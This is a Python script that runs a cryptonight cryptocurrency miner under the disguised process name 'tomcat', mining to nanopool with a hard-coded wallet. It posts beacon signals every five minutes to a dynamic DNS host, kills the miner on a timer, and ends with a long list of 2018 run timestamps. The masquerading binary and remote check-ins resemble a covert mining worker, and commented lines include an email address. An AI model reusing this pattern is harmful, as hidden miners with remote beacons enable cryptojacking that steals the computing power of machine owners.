import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:24:07.262094
#2018-02-17 16:12:04.993266
#2018-02-17 18:01:01.628715
#2018-02-17 19:48:04.449788
#2018-02-17 21:35:06.240834
#2018-02-17 23:20:06.665282
#2018-02-18 01:08:02.208620
#2018-02-18 02:56:06.500596
#2018-02-18 04:46:05.211432
#2018-02-18 06:36:07.196611
#2018-02-18 08:24:06.098057
#2018-02-18 10:12:07.246356
#2018-02-18 11:58:01.274710
#2018-02-18 13:43:04.135156
#2018-02-18 15:34:05.268745
#2018-02-18 17:22:06.576826
#2018-02-18 19:11:01.724768
#2018-02-18 20:57:04.111399
#2018-02-18 22:43:07.659178
#2018-02-19 00:32:01.339443
#2018-02-19 02:17:04.108005
#2018-02-19 04:05:01.297207
#2018-02-19 05:48:07.702600
#2018-02-19 07:37:06.241651
#2018-02-19 09:27:05.479892
#2018-02-19 11:16:05.104025
#2018-02-19 13:03:06.372387
#2018-02-19 14:49:08.687031
#2018-02-19 16:38:01.604932
#2018-02-19 18:24:08.740198
#2018-02-19 20:10:03.079328
#2018-02-19 22:00:05.132222
#2018-02-19 23:46:04.440480
#2018-02-20 01:33:04.430438
#2018-02-20 03:21:01.604125
#2018-02-20 05:09:02.102013
#2018-02-20 06:51:06.834536
#2018-02-20 08:37:03.968304
#2018-02-20 10:21:02.154220
#2018-02-20 12:06:01.530418
#2018-02-20 13:54:11.440248
#2018-02-20 15:37:09.433603
#2018-02-20 17:23:04.775291
#2018-02-20 19:13:01.857392
#2018-02-20 21:02:01.558427
#2018-02-20 22:46:06.471107
#2018-02-21 00:29:04.977256
#2018-02-21 02:15:09.191362
#2018-02-21 04:04:05.218747
#2018-02-21 05:50:07.195521
#2018-02-21 07:38:06.247252
#2018-02-21 09:23:07.390985
#2018-02-21 11:12:07.478133
#2018-02-21 12:58:06.825140
#2018-02-21 14:47:07.517270
#2018-02-21 16:34:11.831142
#2018-02-21 18:25:01.318471
#2018-02-21 20:11:09.088761
#2018-02-21 21:58:02.262797
#2018-02-21 23:46:01.339211
#2018-02-22 01:36:04.433021
#2018-02-22 03:23:05.204606
#2018-02-22 05:10:06.614939
#2018-02-22 06:53:04.938471
#2018-02-22 08:40:06.156202
#2018-02-22 10:27:05.974438
#2018-02-22 12:12:06.314116
#2018-02-22 13:58:06.285350
#2018-02-22 15:45:14.632414
#2018-02-22 17:33:06.591645
#2018-02-22 19:19:01.232385
#2018-02-22 21:10:07.244099
#2018-02-22 22:54:06.907042
#2018-02-23 00:42:05.234717
#2018-02-23 02:31:04.430912
#2018-02-23 04:19:06.928989
#2018-02-23 06:06:08.145978
#2018-02-23 07:53:06.314425
#2018-02-23 10:12:05.229781
#2018-02-23 12:07:04.480213
#2018-02-23 13:54:09.196137
#2018-02-23 15:46:04.368859
#2018-02-23 17:32:02.177214
#2018-02-23 19:18:03.775156
#2018-02-23 21:01:05.778461
#2018-02-23 22:47:01.966580
#2018-02-24 00:34:01.492276
#2018-02-24 02:25:06.363975
#2018-02-24 04:16:01.271945
#2018-02-24 06:04:07.488171
#2018-02-24 07:51:07.104441
#2018-02-24 09:35:07.008390
#2018-02-24 11:29:06.477187
#2018-02-24 13:18:06.973170
#2018-02-24 15:09:07.677782
#2018-02-24 16:58:06.394052
#2018-02-24 18:47:03.671245
#2018-02-24 20:36:06.230190
#2018-02-24 22:41:04.380234
#2018-02-25 01:48:03.726708
#2018-02-25 04:49:07.112579
#2018-02-25 08:11:07.172714